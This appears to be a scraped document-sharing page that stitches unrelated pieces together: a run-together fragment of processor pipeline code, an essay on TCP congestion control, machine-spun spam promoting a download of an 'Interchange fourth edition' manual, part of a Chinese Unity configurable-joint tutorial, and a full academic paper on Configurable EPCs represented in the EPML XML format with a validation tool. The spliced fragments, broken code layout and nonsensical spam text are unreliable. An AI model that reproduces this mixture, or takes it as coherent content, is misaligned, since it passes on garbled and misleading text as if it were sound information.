d_srcA’id_ex_next->srca’#srcA from decoded instruction72intsig d_srcB’id_ex_next->srcb’#srcB from decoded instruction73intsig d_rvalA’d_regvala’#valA read from register file74intsig d_rvalB’d_regvalb’#valB read from register file 7576#####Pipeline Register E##########################################77intsig E_icode’id_ex_curr->icode’#Instruction code78intsig E_ifun’id_ex_curr->ifun’#Instruction function79intsig E_valC’id_ex_curr->valc’#Constant data80intsig E_srcA’id_ex_curr->srca’#Source A register ID81intsig E_valA’id_ex_curr->vala’#Source A value82intsig E_srcB’id_ex_curr->srcb’#Source B register ID83intsig E_valB’id_ex_curr->valb’#Source B value84intsig E_dstE’id_ex_curr->deste’#Destination E register ID。
拥塞控制的英文表达
拥塞控制的英文表达Congestion Control in Computer Networks.Congestion control is a crucial aspect of computer network design and operation, aiming to prevent the degradation of network performance caused by an excessive number of packets competing for limited network resources. When the network becomes congested, it can lead toincreased packet delays, packet losses, and reduced throughput, all of which impact the quality of service (QoS) provided to users.The primary goal of congestion control is to distribute the available network resources fairly and efficiently among all users, ensuring that no single user orapplication monopolizes the bandwidth. This is achieved by various mechanisms that regulate the rate at which data is injected into the network, as well as by detecting and responding to congestion when it occurs.One of the most common congestion control mechanisms is flow control, which operates at the sender-receiver level. Flow control mechanisms regulate the rate at which a sender can transmit data to a receiver, based on the receiver's ability to process and acknowledge the received data. By limiting the sender's transmission rate, flow control helps prevent the receiver's buffer from overflowing, which can lead to packet loss and decreased performance.Another crucial aspect of congestion control is congestion avoidance, which aims to prevent congestion from occurring in the network. Congestion avoidance mechanisms typically involve reducing the transmission rate of data when the network becomes busy, thereby reducing the likelihood of congestion. This can be achieved by various algorithms, such as the slow start and congestion avoidance algorithms used in TCP (Transmission Control Protocol).The slow start algorithm starts with a low transmission rate and gradually increases it as long as the network remains congestion-free. When congestion is detected, the algorithm reduces the transmission rate and enters thecongestion avoidance phase, where it slowly increases the rate again while monitoring the network conditions. This dynamic adjustment of the transmission rate helpsdistribute the load evenly across the network and prevent congestion.In addition to flow control and congestion avoidance, other congestion control mechanisms include congestion detection and recovery. Congestion detection involves monitoring the network for signs of congestion, such as increased packet delays or packet losses. When congestionis detected, the network may take various actions to recover, such as notifying senders to reduce their transmission rates or redirecting traffic to alternative paths.To ensure effective congestion control, it is essential to have a combination of mechanisms operating at different levels of the network architecture. This includes bothlocal congestion control mechanisms, such as flow control, and global congestion control mechanisms, such as routing algorithms and traffic engineering techniques. Bycoordinating these mechanisms, it is possible to achieve efficient and reliable network performance, even under high load conditions.In conclusion, congestion control is a critical aspect of computer network design and operation. By regulating the rate at which data is injected into the network, detecting and responding to congestion, and coordinating mechanisms at different levels of the network architecture, it is possible to distribute the available network resourcesfairly and efficiently among all users, ensuring high-quality services and reliable network performance.。
IBM Cognos Transformer V11.0 用户指南说明书
interchangefourtheditioncambridge-…
INTERCHANGE FOURTH EDITION CAMBRIDGEInterchange fourth edition cambridge is surely an indispensable tool, utilized for making repairs inside the product. The manual can be simply downloaded from the web, which is very useful in attempting to download manual repair parts online. In order to view the manual, you have to enter the model no . and the name of the manufacturing company and Voila! You might be began on your DIY (Do-It-Yourself) work for fixing your product. Owner's manual usually includes schematic roadmaps with a summary of repair parts list that is certainly also used by most professionals. The manual usually has the product you got, however if you simply can't think it is, you could download it from the web. If you're not so net savvy, it's also possible to call the manufacturing service in order to find the manual on your product.A few of interchange fourth edition cambridge are for sale for free although some are payable. If you're not sure if the manuals you wish to download works with to be used with your computer, you'll be able to download free trials. The disposable guides make it possible for you to definitely test the manual and see whether they'd like to manage to utilize the application effectively on the computer. You are able to therefore be able to get manuals and guides on the net for numerous products.When you purchase a product or service, interchange fourth edition cambridge always has the package. The owner's manual usually jot down all features and information regarding the product or service that can help you, the dog owner, understand the product better. However, most product owners tend not to spend some time to explore the manual more once they got the product or service from the manufacturer, maybe because they're so enthusiastic about the newest shiny product they may be holding within their hands. Generally, owners manuals are just tossed away into oblivion. One other reason why people often overlook the manual is because discover the manual too technical - maybe the terms used are new and confusing towards the owner - specifically beginners. Terms such which can be overwhelming for many new users. Or, there appears to be a lot of information to digest. Experienced ones can also be prone to overlook the manuals given that they think they're betting that too well.DOWNLOAD : INTERCHANGE FOURTH EDITION CAMBRIDGEEDITION CAMBRIDGE, AND ALSO A CORRECTLY FORMATTED TYPE OF THE INSTANCEINSTRUCTIONS PAGE ABOVE..EDITION CAMBRIDGE, AND ALSO A CORRECTLY FORMATTED TYPE OF THE INSTANCEINSTRUCTIONS PAGE ABOVE..IN ORDER TO LEARN ANOTHER SPECIFICS OF RECENT ENTRIES FOR INTERCHANGE FOURTH EDITION CAMBRIDGE AS WELL AS ANY RELATED INFORMATION SIMPLY CONTINUE WITH THEGIVEN LINKS BELOW..。
configurable joint用法 -回复
configurable joint用法-回复如何使用configurable joint。
引言:Configurable joint是Unity中的一种机制,它允许开发人员通过对物体之间的关节进行配置和控制来模拟和控制物理联动行为。
这为游戏开发者提供了更大的灵活性和自定义性,可以创建各种精细的物体联动效果。
在本文中,我们将一步一步回答如何使用configurable joint,让你能够轻松地创建各种物体之间的联动行为。
第一步:添加configurable joint组件要使用configurable joint,首先你需要在需要进行联动的物体上添加configurable joint组件。
在Unity编辑器中,选择目标物体并在Inspector 窗口中点击“Add Component”按钮。
在弹出的菜单中搜索“Configurable Joint”并选择它。
这样,你就成功地将一个configurable joint组件添加到了目标物体上。
第二步:配置joint参数一旦你添加了configurable joint组件,你就需要根据实际需求来配置joint的参数。
在Inspector窗口的configurable joint组件下,你可以看到一系列的参数供你调整。
让我们来一一了解这些参数的作用。
1. Connected BodyConnected Body参数定义了联动的目标物体。
你可以选择另一个物体作为目标物体,以便它们之间可以发生联动行为。
点击Connected Body 参数旁边的小圆点,你可以选择场景中的其他物体作为目标物体。
2. X/Y/Z MotionX/Y/Z Motion参数定义了joint在各个轴向上的运动方式。
你可以选择设置joint在某个轴向上的运动为自由(Free)、固定(Locked)或者限制在某个范围内(Limited)。
3. Angular X/Y/Z MotionAngular X/Y/Z Motion参数与上一个参数类似,但是是针对旋转运动的。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
Towards the Interchange of Configurable EPCs:An XML-based Approach for Reference Model Configuration∗Jan Mendling1,Jan Recker2,Michael Rosemann2,Wil van der Aalst31Vienna University of Economics and Business Administrationjan.mendling@wu-wien.ac.at2Queensland University of Technology{j.recker,m.rosemann}@.au3Eindhoven University of Technologyw.m.p.v.d.aalst@tm.tue.nlAbstract:Recent research has led to proposals for the model-driven configurationof Enterprise Systems(ES)by the help of configurable reference models.While theproposed Configurable EPCs(C-EPCs)provide adequate conceptual support towardsreference model configuration,the issue of translating the configured models towardsexecutable process specifications has not been approached yet.Afirst step in this di-rection is the definition of a machine-readable format for C-EPCs that can be usedas an interchange format and as an input format for transformations.This paper pro-poses a C-EPC representation in XML based on the EPC Markup Language(EPML)format.We take the formal C-EPC syntax definition as a starting point to define the re-quirements for a respective extension to EPML and introduce a C-EPC representationin EPML.Furthermore,we introduce the C-EPC Validator,a program that generatesvalidity reports for C-EPCs represented in EPML.The C-EPC Validator can be usedto validate both configurable and configured C-EPCs.Finally,we highlight futureapplication areas of the C-EPC schema.1IntroductionEnterprise Systems(ES)support and enhance organizations in their business operations if, and only if,they are well-configured as to the specific organizational requirements.This configuration process is not only time-and resource-consuming but moreover proven to result in severe business failure if conducted badly[Da98].This notion of misalignment is predominantly visible in the process dimension,i.e.the(mis-)alignment of IT func-tionality to the actual business processes of an organization[LLO93].In many cases,it is observed that the system hampers the normal way of handling processes instead of sup-porting it.This is surprising given the fact that business process orientation as a concept has been a major topic in both academia and practice at least since the1990’s[HC93]. The popularity of business process management is steadily rising,in general terms,lead-ing to a proliferation of various process modeling approaches.This heterogeneity of pro-∗The research on the C-EPC isfinancially supported by SAP Research.prietary process modeling schemas and formats has been the major motivation for the definition of EPML(EPC Markup Language)[MN04,MN05]in order to facilitate the communication and interchange between various business process modeling tools.In this paper,we will foremost consider Event-Driven Process Chains(EPC)[KNS92]due to their wide-spread use for reference modeling in the context of Enterprise Systems(cf.e.g. SAP and its reference model that is defined using EPCs[CKL97]).The fact that most Enterprise Systems are extensively depicted in their reference models motivates the idea of utilizing such reference models for the task of systems configuration to allow for a more intuitive,model-driven approach.We have been developing a reference modeling approach that considers the configurable nature of an Enterprise System.The representation language of this approach is called a Configurable EPC(C-EPC).While previous research focused on the theoretical development of the meta model and the no-tation of C-EPCs[RvdA05],this paper explores the technical stage of ES configuration by outlining an approach how to represent C-EPC configuration in a machine-readable XML syntax.Such a schema may serve as a starting point for transformations towards ex-ecutable process specifications,forming the basis for systems workflow implementations. To be more concise,the aim of our paper is the specification of C-EPCs in an XML schema that builds on the established EPML format.Such EPML representation of C-EPCs is required in order to support various scenarios of reference model configuration including(a)the XML schema-based evaluation of the validity of configurations,(b)the implementation of an EPML tool for the automatic translation of C-EPCs to regular EPCs, (c)the transformation of C-EPCs to other process specifications,and(d)the facilitation of modeling C-EPCs in existing tools such as ARIS Toolset or EPC Tools.Addressing this research objective,the remainder of our paper is structured as follows.In Section2we present the conceptual background of our research by briefly outlining the basic notions of C-EPCs and EPML.Section3discusses the formal specification of the C-EPC syntax as an extension to the EPML schema.We then report on the evaluation of C-EPCs as to the validation of lawful configurations.In this context,we introduce a validation program called C-EPC Validator.After discussing related research efforts in Section4we conclude the paper in Section5and give an outlook on future research.2Configurable EPCs and EPML2.1On the Notion of C-EPCsApplication reference models are frequently used by Enterprise System vendors to high-light and explain the functionality of their software packages.However,such reference models are rarely deployed in the process of configuring Enterprise Systems,which is surprising given that the main objective of reference models is to streamline the design of particular models.Yet,the transformation(better:configuration)of reference models to individual models is so far at best scarcely supported through the underlying reference model languages.The lack of language expressiveness denotes a major issue for refer-ence model users,as reference models fail to depict configuration alternatives and do not provide adequate decision support towards the selection of configuration alternatives. Addressing these issues,this section introduces Configurable EPCs(C-EPCs)as a rep-resentation form for configurable reference models.In order to embody configuration-related information in conceptual process models,the traditional EPC[KNS92]had to be extended,leading to the definition of the C-EPC.Its notion has been introduced and formalized in[RvdA05],therefore we only discuss the basic notation here.C-EPCs may be used to depict two statuses of a reference model:(a)as a model depicting configuration alternatives(such as the one depicted in the left part of Figure1),and(b)as a model depicting configuration selections(right part of Figure1).Figure1:An example of a C-EPC(configurable and configured).In a C-EPC functions and connectors can be configured.Notation-wise,these configurable nodes are denoted by bold line.Configurable functions may be included(ON),excluded (OFF),or conditionally skipped(OPT).To be more specific,for configurable functions, a decision has to be made whether to perform this function in every process instance at run-time,whether to exclude this function permanently,i.e.it will not be executed in any process instance,or whether to defer this decision to run time,i.e.for each process instance it has to be decided whether to execute the function or not.Configurable con-nectors subsume possible build-time connector types that are less or equally expressive. Hence,a configurable connector can only be configured to a connector type that restrictsTable1:Constraints for the configuration of connectorsConf.Connector Maps to OR Maps to XOR Maps to AND Maps to SEQ n OR X X X XXOR X XAND Xits behavior.A configurable OR-connector may be mapped to a regular OR-,XOR-,or AND-connector.Or,the OR-connector may be mapped to a single sequence of events and functions(indicated by SEQ n for some process path starting with node n).A configurable AND-connector may only be mapped to a regular AND-connector.A configurable XOR-connector may be mapped to a regular XOR-connector or to a single sequence SEQ n. Table1illustrates the mapping constraints for configurable connectors.In order to depict inter-dependencies between configurable EPC nodes,the concept of configuration requirements has been introduced.Inter-related configuration nodes may be constrained by such requirements.Consider the example given in the left part of Figure 1.If the configurable function A is excluded,the inter-related configurable OR-connector must be mapped to an AND-connector.Such configuration requirements are best defined via logical expressions in the form of If-Then-statements.Moreover,configuration guide-lines provide input in terms of recommendations and proposed best practices(also in the form of logical If-Then-expressions)in order to support the configuration process seman-tically.Consider again the example given in the left part of Figure1.A recommendation could be that if function D is included,then so should be function E.Summarizing,re-quirements and guidelines represent hard(must)respectively soft(should)constraints. 2.2An Introduction to EPMLThe specification of the EPC Markup Language(EPML)has been motivated by the het-erogeneity of proprietary interchange formats of business process modeling tools[MN04, MN05].It has been defined as a tool-neutral interchange format,following the design principles readability,extensibility,tool orientation,and syntactical correctness.EPML captures the essential concepts of EPCs.These include function and event type elements, and,or,and xor join and split connectors,as well as decomposition via hierarchical func-tions and process interfaces.The controlflow is defined by arcs between these elements. Beyond that,EPML introduces concepts that leverage the interchange between process repositories.An EPMLfile can store multiple EPC models.These can be arranged in a hierarchy of directories that allows for a logical grouping of models.So-called definitions allow to define a logical model element that is used several times in a graphical model. The elements of an EPC are grouped into an epc which is identified by a unique epcId. Each EPC element is represented as a subelement of epc with the element name indi-cating its EPC element type,i.e.functions are given as function elements,events asevent elements etc.Each EPC element is assigned a unique id of integer type and a name.The arc elements define the controlflow via their flow child element.Each arc is pointing from the EPC element whose id is referenced in the source attribute to that element referenced in the target attribute.All elements of an EPC may include graphi-cal information about their layout,position,and size in the model.Additional information can be annotated to process elements via attributes.Each attribute has to reference an attribute type,which helps to identify attributes of the same kind.Furthermore,rela-tionships between controlflow elements and participant,dataField,as well as application elements can be defined.Due to space restrictions we abstain from an in-depth discussion of the EPML here.For details refer to[MN05].2.3Requirements for a C-EPC Representation in EPMLA representation of C-EPCs in EPML demands a formal definition of the C-EPC as a basis for specifying an interchange format.The definition of the C-EPC syntax is based on the notion of classical EPCs as defined in[KNS92]and formally specified in[vdA99].For more information on formal descriptions of EPCs refer to[MN05].For the purpose of this paper we stick to the C-EPC formalization given in[RvdA05].Definition1(Configurable EPC)A Configurable EPC(C-EPC)is a ten-tuple defined as(E,F,C,l,A,F C,C C,O C,R C,G C)such that:–E,F,C,l,and A refer to standard EPC elements events,functions,connectors,a mapping to define a label AND,OR,or XOR for each connector,and arcs[vdA99].–F C⊆F is the set of configurable functions.–C C⊆C is the set of configurable connectors.–O C⊆(F C∪C C)×(F C∪C C)is a partial order over the configuration nodes defining the suggested order in which these nodes are mapped to concrete values.–R C is the set of configuration requirements.–G C is the set of configuration guidelines.Both R C and G C contain statements about binding configurable nodes to concrete values. Consider the example of a requirement like“if c∈C C=XOR then f∈F C=ON”. This represents a logical predicate about a configuration that must hold true.In contrast to that,a guideline represents an advise that may or may not be fulfilled by a configuration. Accordingly,the latter also represent predicates,but these do not necessarily hold true. Nevertheless,a logic-based representation of guidelines provides for formal evaluation in how far a configuration complies with industry best practices given in the guideline. Concerning configurable connectors,we formalize the constraints given in Table1by a partial order.This partial order≤C specifies which concrete connector type may be used for a given configurable connector type.Definition2(Partial Order)The partial order≤C is defined on CT={AND,OR, XOR}∪CT S where CT is the set of connector types and the sequence operator is referred to as CT S={SEQ n|n∈E∪F∪C}.According to Table1the partial order is defined as≤C={(AND,AND),(XOR,XOR), (OR,OR),(XOR,OR),(AND,OR)}∪{(n,XOR)|n∈CT S}∪{(n,OR)|n∈CT S}∪{(n,n)|n∈CT S}.For example,XOR≤C OR and SEQ n≤C XOR imply that the second configurable connector can be mapped to thefirst connector or a sequence,respectively.Before specifying a configuration,we need to define the notation for sets of predecessor and successor nodes.Notation1(Predecessor and Successor Nodes)Let N be a set of nodes and A⊆N×N a binary relation over N defining the arcs.For each node n∈N,we define the set of predecessor nodes•n={x∈N|(x,n)∈A},and the set of successor nodes n•= {x∈N|(n,x)∈A}.Then,a configuration maps all configurable nodes to concrete values.Definition3(Configuration l C)Let C-EPC=(E,F,C,l,A,F C,C C,O C,R C,G C) be a C-EPC.The mapping l C∈(F C→{ON,OF F,OP T})∪(C C→CT)is called a configuration of C-EPC if for each c∈C C:–l C(c)≤C l(c).–If l C(c)∈CTS and c∈C J,then there exists an n∈•c such that l C(c)=SEQ n.–If l C(c)∈CTS and c∈C S,then there exists an n∈c•such that l C(c)=SEQ n. The function l C maps configurable functions onto concrete values.Configurable connec-tors are mapped onto the set CT.Clearly this mapping should be consistent with the constraints depicted in Table1and the partial order≤C.Moreover,if l C(c)=SEQ n, then n should be in the pre-set(for a join connector,i.e.c∈C J)or post-set(for a split connector,i.e.c∈C S)of c.The right part of Figure1shows an example for a configured C-EPC model where the con-figurable OR-connector has been mapped to a regular AND-connector and where function A and D have been excluded.What,however,hasn’t been ensured at that point is that the configured C-EPC is depicted as a traditional lawful EPC.As outlined in[RRvdAM05], this translation process bears in itself semantic and syntactical complications,which result in a need for tool support based on a rigorous formal specification.Hence,in the follow-ing,we take the formal syntax of C-EPCs presented here as a starting point to specify a schema for C-EPCs via an extension to EPML.This may then be used to validate the syntactical correctness of both C-EPCs and configurations of C-EPCs,respectively.3Towards an EPML Schema for C-EPCs3.1The C-EPML SchemaForthcoming from our preceding elaborations on the two statuses of C-EPCs(see Section 2.1),we must seek a specification that allows for a representation of C-EPCs both before configuration,i.e.configurable C-EPCs,and after configuration,i.e.configured C-EPCs, in accordance to the definitions specified in the previous section.New EPML elements need to be defined.These elements have to capture the C-EPC extensions to EPCs,i.e.configurable functions,configurable connectors,a partial order of configuration nodes representing a suggested order of configuration,configuration re-quirements,and configuration guidelines.We base our C-EPC extension of EPML on the principle of EPML compatibility:on the one hand,standard EPC models represented in EPML should still be valid against the C-EPC extended EPML schema.On the other hand,EPML tools that are not aware of configuration aspects should still be able to pro-cess a C-EPC as a standard EPC,simply by ignoring additional configuration information. This implies that we do not introduce additional EPML elements for configurable func-tions and connectors but instead define attribute elements to annotate epc,function, and connector elements with configuration information in a structured manner.Also, we need to distinguish between configurable and configured C-EPCs.We thus introduce further configuration attributes annotated to configurable functions and connectors that optionally capture the desired configuration values.Configurable Functions:Configurable functions f∈F C are specified in EPML as function elements having a respective configurableFunction child element. Those functions not having this child element are standard EPC functions that cannot be configured.In order to depict that the function has been configured,the configuration value has to be given in a further nested configuration element and its value at-tribute.This attribute is restricted to the values on,off,and opt.The XML syntax is as follows(question marks indicate that an element is optional):<function id=’xs:integer’><configurableFunction>?<configuration value=’on|off|opt’/>?</configurableFunction></function>Configurable Connectors:Configurable connectors c∈C C are specified as EPML and,or,or xor elements having a respective configurableConnector child element. Those connector elements not having this child element are standard EPC connectors that cannot be configured.In order to depict that the connector has been configured,the con-figuration value has to be given in a further nested configuration element and its value attribute.According to Table1,this attribute is restricted to the values and forand connectors;seq,and,xor,and or for or connectors;and seq and xor for xor connectors.The XML syntax is as follows,e.g.for an or connector:<or id=’xs:integer’><configurableConnector>?<configuration value=’seq|and|xor|or’goto=’xs:integer’?/>?</configurableFunction></or>Note that for configurable connectors that may be mapped to a single sequence,a con-ditional goto attribute is specified that serves as a pointer to a successor node of the sequence that is ing XML schema,it is not possible to check the correctness of such sequence configuration.We will address this problem in Section3.2.Partial Order of Configuration Nodes:The order of configuration o∈O C is specified using standard EPML relation elements.The type of a relation has to be specified as a definition in the header of an EPMLfile.The partial order of configuration must be defined with a defId set to ConfOrder.In an epc element the from and to attributes of a relation define a“first from,then to”order relationship between the referenced elements.The XML syntax is as follows:<definition defId=’ConfOrder’/>...<relation id=’xs:integer’from=’epml:refFromId’to=’epml:refToId’/>Note that this partial order merely specifies a suggested order of configuration,hence it de-notes a predicate for configuration that may or may not hold true.Indeed,it is an optional element that may be used to streamline and guide the process of model configuration. Configuration Requirements:The configuration requirements r∈R C are represented by child elements of the respective epc process container element.The idRefs attribute holds a list of references to those elements that are related to the requirement.The require-ment is composed of a if and a then part.Both contain xpath attributes holding XPath statements(for further details on XPath refer to[CD99]).These statements are evaluated either relative to the epc node or absolute against the EPML ing absolute statements,constraints can be defined across several C-EPC models.If the if part of the requirement is true,the then part must be true,too.The XML syntax is as follows:<configurationRequirement idRefs=’list of xs:integer’> <if xpath=’xpath-statement’/><then xpath=’xpath-statement’/></configurationRequirement>Configuration Guidelines:Configuration guidelines g∈G C are captured by the same XML structure as requirements.Still,there is the semantic difference that requirements must be met,and guidelines should be met.The XML syntax is as follows: <configurationGuideline idRefs=’list of xs:integer’> <if xpath=’xpath-statement’/><then xpath=’xpath-statement’/></configurationGuideline>As a summary of the EPML extension for C-EPCs,we pick up the example from Figure 1.Figure2gives the same C-EPC model with its EPML representation.The configurable functions,configurable connectors and the configuration order are easy to identify.Note that the id attributes hold arbitrary integer values.We will now briefly explain the XPath statements of the configuration requirement.The if statement of the requirement iden-tifies a function element.As defined above,a relative statement is evaluated in the context of the current epc element.This means here that function elements of other epc elements of the EPMLfile are not considered.The square brackets define a constraint in XPath.Accordingly,the requirement defines that if a function with id=7and config-uration mapped to off is part of the EPC,then an OR connector with id=9and which is configured to AND must exist in the model,too.The configuration guideline works similarly.<epml>...<definitions><definition defId='ConfOrder'/></defintions>...<epc epcId ='1' name='example'><configurationRequirement idRefs='7 9'><if xpath='function[@id='7'][//@value='off']'/><then xpath='or[@id='9'][//@value='and']'/></configurationRequirement><configurationGuideline idRefs='17 19'><if xpath='function[@id='17'][//@value='on']'/><then xpath='function[@id='19'][//@value='on']'/></configurationGuideline>...<function id ='7' name='A'><configurableFunction><configuration value='off'/></configurableFunction></function>...<or id ='9'><configurableConnector><configuration value='and'/></configurableConnector></or><relation id ='12'defRef='confOrder'from='7' to='9'/>...</epc>...</epml>Figure2:An example of a C-EPC and parts of its EPML representation.3.2On the Automatic Validation of C-EPCsBuilding on the EPML-based interchange format for C-EPCs,various tools can be de-veloped for the support of reference model configuration.As afirst step towards com-prehensive tool support for C-EPCs,we have implemented an C-EPC validation program called C-EPC Validator4.The C-EPC Validator dynamically evaluates the XPath state-ments given in configuration requirements and guidelines to assess the validity of selected model configurations.As XML schema languages do not support complex constraints as defined by C-EPC’s configuration requirements and guidelines(for more information on the limitations of XML schema languages in the context on EPCs refer to[MN03]),we chose an XSLT-based implementation.Furthermore,to allow for dynamic evaluation of XPath statements we use EXSLT extensions5.The C-EPC Validator takes an EPML document as input and generates a report as an HTML document.Basically,three kinds of properties are validated.First,the C-EPC Val-idator checks the syntactical correctness of the C-EPC.This is partially redundant to the validation that can be done using the EPML schema.Yet,on the schema level it is not possible to check whether connectors are correctly configured to sequences.A configu-ration value of seq requires the optional goto attribute to be included.Furthermore, this attribute must point to a successor node of the connector.This constraint is specified using XSLT.Second,the C-EPC Validator checks the compliance of the configured model to the requirements.Conditions and implications are highlighted with green and red font color to easily identify violations.As an example consider Figure3.The left part shows a possible configuration of the C-EPC presented in the left part of Figure1.As can be seen,the configuration requirement is violated as the configurable OR-connector has been mapped to an XOR-connector although the configurable function A has been mapped to off.Third,the same mechanism as for requirements is used to validate the guidelines. Violations are given in orange font color.4Related Work4.1Configurable Reference ModelsResearch on configurable reference models can be divided into requirements engineering for the development of Enterprise Systems,e.g.[Br99],and requirements engineering for the configuration of Enterprise Systems.The latter is the focus of this paper.Related work on configurative reference modeling includes the perspectives-based config-urative reference process modeling approach by Becker et al.[BDD+04].This approach proposes several mechanisms for automatically transforming a reference model into an 4The C-EPC Validator and the EPML Schema that supports C-EPCs can be downloaded from http://wi.wu-wien.ac.at/˜mendling/EPML5The program can be run using XSLT processors that understand EXSLT extensions,e.g.the XALAN pro-cessor(see /xalan-j).For EXSLT extensions to XSLT see .Figure 3:A configured C-EPC,and the validation report of the C-EPC Validator.individual model.While the work of Becker et al.focuses on generic adaptation mecha-nisms,our research pursues a reference model-driven approach towards ES configuration and moreover considers the technical stage of model translation as well.Soffer et al.’s suggestions on ERP modeling [SGD03]can also be regarded as close to our proposed ideas.Following the concept of scenario-based requirements engineering,they evaluate the Object-Process Modeling Methodology in order to determine a most appropriate ERP system representation language.The so-called argumentation facet,related to the ability of a modeling language to express optionality-related information,is one of their many criteria.Their work does not comprehensively analyze requirements related to modeling ERP configurability and focuses on technique evaluation rather than on the development of a more appropriate technique.Brehm et al.discuss alternative ways of configuring En-terprise Systems [BHM01].Their taxonomy for ERP configuration and customizing is widely cited.However,they do not demonstrate how this work can be linked to reference models of Enterprise Systems.4.2Business Process Modeling Interchange FormatsVarious interchange formats and schemas have been proposed for business process mod-eling.For an overview refer to[MNN04].Among the design criteria for interchange for-mats,the criterion of extensibility(cf.e.g.[Ko92])is of special importance to our work. As we extend EPML with C-EPC concepts,it has to be granted that documents complying with old versions of the schema remain valid.Our approach is to add optional elements nested in epc,function,and connector elements.Among interchange formats that have been proposed for business process modeling,none captures configuration directly.In terms offlexible generation of process models,the idea behind OWL-Services(OWL-S)[APS+03]is closest to our approach.OWL-S is a ser-vice meta model represented in OWL building on an(input-output-preconditions-effects) quadruple to describe services.OWL-S is aimed at languages to enable dynamic compo-sition of processes.Yet,such a dynamically composed process is generated via automatic reasoning on service descriptions stored in a repository,and not by manual configuration as in the case of C-EPCs.Furthermore,dynamically built service compositions are not explicitly meant for reuse as a process model,but rather for one-time instantiation.Other languages like Business Process Execution Language for Web Services(BPEL4WS,WS-BPEL,or BPEL)[ACD+03]provide someflexibility as they permit dynamic identification of service endpoints.This may also be considered as related to configuration aspects in general.Yet,these aspects are not standardized in the specification.Furthermore,BPEL is directed at the definition of executable processes rather than configurable conceptual process models.As far as we are aware,C-EPC is the only dedicated Configurable Busi-ness Process Modeling language and EPML the only BPM interchange format that support configuration aspects on a conceptual level.5Conclusion and Future WorkThis paper presented an XML schema-based specification of the C-EPC using the EPML format.We reported on the design of the C-EPC compliant schema and outlined a proto-type called C-EPC Validator for the validation of model configuration using the C-EPC. Our research has a few limitations.First,our conceptual approach needs to be empirically validated with business practitioners to prove its feasibility and applicability.This task is currently being conducted.Second,we have not yet approached the task of translating C-EPCs to other process specifications.However,as the schema is now available,we are currently working on transformations and respective tool support.Third,there is not yet adequate tool support for the modeling of C-EPCs.However,transformations between EPML and ARIS Markup Language are available.Furthermore,the SemTalk business process modeling tool and the open-source modeling platform EPCTools support EPML. Hence,existing modeling solutions can easily be modified and adapted to cater for the C-EPC extensions of the EPC modeling language.Again,this task will be approached in the near future.。